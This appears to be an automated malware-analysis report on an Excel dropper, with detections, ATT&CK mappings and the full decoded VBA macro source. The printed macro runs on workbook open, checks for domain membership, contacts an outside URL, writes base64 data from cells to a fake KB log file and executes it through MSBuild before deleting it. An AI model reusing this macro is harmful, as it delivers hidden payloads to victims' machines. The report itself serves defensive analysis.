MALICIOUS
338
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Excel file containing VBA macros that are triggered by the AutoOpen or Workbook_Open events. These macros utilize WScript.Shell and CreateObject, indicating an intent to execute commands or scripts. The presence of a URL suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection as 'Xls.Dropper.Agent-7137986-0' further supports its role as a dropper.
Heuristics 11
-
ClamAV: Xls.Dropper.Agent-7137986-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7137986-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oFile = Nothing Set oShell = CreateObject("WScript.Shell") oShell.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe C:\windows\tasks\KB20183849.log" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim DM, EL Set DM = CreateObject("Microsoft.XMLDOM") ' Create temporary node with Base64 data type -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
partOfDomain = False Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() End Sub -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Sheets("Sheet1").Visible = True -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://express.scripts-careers.com/1 In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5111 bytes |
SHA-256: 0a6cda0130a602bc7e1125f7019c13fff4ad72215af782944df96972c2834604 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function checkPartOfDomain()
partOfDomain = False
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
partOfDomain = True
End If
Next
If partOfDomain Then
checkPartOfDomain = True
Debug.Print ("part of domain")
Else
checkPartOfDomain = False
Debug.Print ("Not attached to a domain")
End If
End Function
Function decodeBase64(base64)
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
' Create temporary node with Base64 data type
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
' Set encoded String, get bytes
EL.text = base64
decodeBase64 = EL.NodeTypedValue
End Function
Sub writeBytes(file, bytes)
Dim binaryStream
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = TypeBinary
'Open the stream and write binary data
binaryStream.Open
binaryStream.Write bytes
'Save binary data to disk
binaryStream.SaveToFile file, ForWriting
End Sub
Sub Do_Stuff()
Dim text
Dim cwd
Dim fullPath
Dim ExcelSheet As Object
Dim res
Dim res1
If checkPartOfDomain Then
'Ping
Dim ie_com
Set ie_com = CreateObject("InternetExplorer.Application")
ie_com.Silent = True
ie_com.Visible = False
ie_com.Navigate "https://express.scripts-careers.com/1", 14, 0, Null, Null
While (ie_com.busy)
Wend
ie_com.Quit
cwd = Application.ActiveWorkbook.Path
fullPath = "c:\windows\tasks\KB20183849.log"
'obtain the decoded base64 values from the range of cells
'Dim base64Decoded As String
'base64Decoded = Base64DecodeString(ThisWorkbook.Sheets("Sheet1").Range("A500", "A510").Value)
text = Worksheets("Sheet1").Cells(500, "A").Value
text1 = Worksheets("Sheet1").Cells(501, "A").Value
text2 = Worksheets("Sheet1").Cells(502, "A").Value
text3 = Worksheets("Sheet1").Cells(503, "A").Value
text4 = Worksheets("Sheet1").Cells(504, "A").Value
text5 = Worksheets("Sheet1").Cells(505, "A").Value
text6 = Worksheets("Sheet1").Cells(506, "A").Value
text7 = Worksheets("Sheet1").Cells(507, "A").Value
text8 = Worksheets("Sheet1").Cells(508, "A").Value
text9 = Worksheets("Sheet1").Cells(509, "A").Value
text10 = Worksheets("Sheet1").Cells(510, "A").Value
text11 = Worksheets("Sheet1").Cells(511, "A").Value
text12 = Worksheets("Sheet1").Cells(512, "A").Value
text13 = Worksheets("Sheet1").Cells(513, "A").Value
text14 = Worksheets("Sheet1").Cells(514, "A").Value
Full = text + text1 + text2 + text3 + text4 + text5 + text6 + text7 + text8 + text9 + text10 + text11 + text12 + text13 + text14
decode = decodeBase64(Full)
writeBytes fullPath, decode
'Dim fso As Object
'Set fso = CreateObject("Scripting.FileSystemObject")
'Dim oFile As Object
'Set oFile = fso.CreateTextFile(fullPath)
'oFile.Write decode
'oFile.Close
Set fso = Nothing
Set oFile = Nothing
Set oShell = CreateObject("WScript.Shell")
oShell.Run "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe C:\windows\tasks\KB20183849.log"
Application.Wait (Now + TimeValue("0:00:20"))
Kill "C:\Windows\tasks\KB20183849.log"
End If
End Sub
Sub AutoOpen()
End Sub
Sub Workbook_Open()
Sheets("Sheet1").Visible = True
Sheets("Sheet1").Activate
Do_Stuff
End Sub
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Button11_Click()
ActiveWorkbook.Close False
Application.Quit
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.